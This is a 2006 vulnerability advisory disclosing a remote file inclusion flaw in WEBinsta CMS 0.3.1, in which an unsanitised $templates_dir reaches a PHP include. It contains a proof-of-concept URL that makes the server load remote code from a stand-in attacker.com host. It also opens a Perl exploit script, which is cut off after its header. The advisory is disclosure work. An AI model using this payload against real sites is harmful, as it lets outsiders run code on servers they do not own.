|
ECHO_ADV_45$2006=0D
=0D
-----------------------------------------------------------------------------------------=0D
[ECHO_ADV_45$2006] WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Vulnerability=0D
-----------------------------------------------------------------------------------------=0D
=0D
Author : M.Hasran Addahroni=0D
Date : Aug, 12th 2006=0D
Location : Australia, Sydney=0D
Web : http://advisories.echo.or.id/adv/adv45-K-159-2006.txt=0D
Critical Lvl : Dangerous=0D
---------------------------------------------------------------------------=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Application : WEBinsta CMS =0D
version : 0.3.1=0D
URL : http://www.webinsta.com/ =0D
https://sourceforge.net/projects/webinsta/=0D
http://atomo64.puffinhost.com/page/webinsta_cms.html=0D
Description :=0D
=0D
WEBinsta CMS provides a dynamic website building solution for small buisness and =0D
indivisuals who want to make their web presence felt. It provides a powerful =0D
system for people who doesn't know nothing about html or PHP.=0D
Webinsta CMS is not longer supported by the Webinsta Team, now atomo64 =0D
the only active developer and he's going to continue with it's development.=0D
The new CMS name is InWeb CMS =0D
=0D
---------------------------------------------------------------------------=0D
=0D
Proof of Concept:=0D
~~~~~~~~~~~~~~~=0D
Vulnerable Script: index.php .=0D
=0D
---------------index.php--------------------------------=0D
...=0D
$tp_main=new bTemplate();=0D
$tp_temp=new bTemplate();=0D
=0D
include("code/processmods.php");=0D
/*Read the block definition and the number*/=0D
include($templates_dir."template.def.php");=0D
/*administration panel and editing settings */=0D
$show_edit=false;=0D
...=0D
------------------------------------------------------------------=0D
=0D
Variables $templates_dir are not properly sanitized.=0D
When register_globals=on and allow_fopenurl=on an attacker can =0D
exploit this vulnerability with a simple php injection script.=0D
=0D
Poc/Exploit:=0D
~~~~~~~~~~~=0D
=0D
http://www.target.com/[webinstacms_path]/index.php?templates_dir=http://attacker.com/evil?=0D
=0D
Solution:=0D
~~~~~~~~=0D
=0D
use the latest version=0D
=0D
Notification:=0D
~~~~~~~~~~~=0D
=0D
vendor not contact yet=0D
=0D
---------------------------------------------------------------------------=0D
Shoutz:=0D
~~~~~~=0D
~ ping - my dearest wife, for all the luv the tears n the breath=0D
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative,kaiten=0D
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw=0D
~ SinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit, x16=0D
~ newbie_hacker@yahoogroups.com=0D
~ #aikmel #e-c-h-o @irc.dal.net=0D
=0D
---------------------------------------------------------------------------=0D
Contact:=0D
~~~~~~~=0D
=0D
K-159 || echo|staff || eufrato[at]gmail[dot]com=0D
Homepage: http://k-159.echo.or.id/=0D
=0D
-------------------------------- [ EOF ] ----------------------------------=0D
=0D
Perl Exploit:=0D
~~~~~~~~~~~=0D
=0D
#!/usr/bin/perl=0D
##=0D
# WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Exploit=0D
# Bug Found & code By K-159 =0D
##=0D
# echo.or.id (c) 2006=0D
# =0D
##=0D
# usage:=0D
# perl WEBinsta.pl